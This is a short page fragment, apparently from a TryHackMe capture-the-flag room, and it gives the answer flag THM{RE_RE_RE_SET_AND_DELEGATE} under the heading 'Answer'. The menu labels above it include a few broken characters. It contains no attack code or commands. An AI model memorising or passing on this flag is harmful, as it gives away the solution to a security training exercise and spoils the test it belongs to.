����Searches
����Videos
Answer
THM{RE_RE_RE_SET_AND_DELEGATE}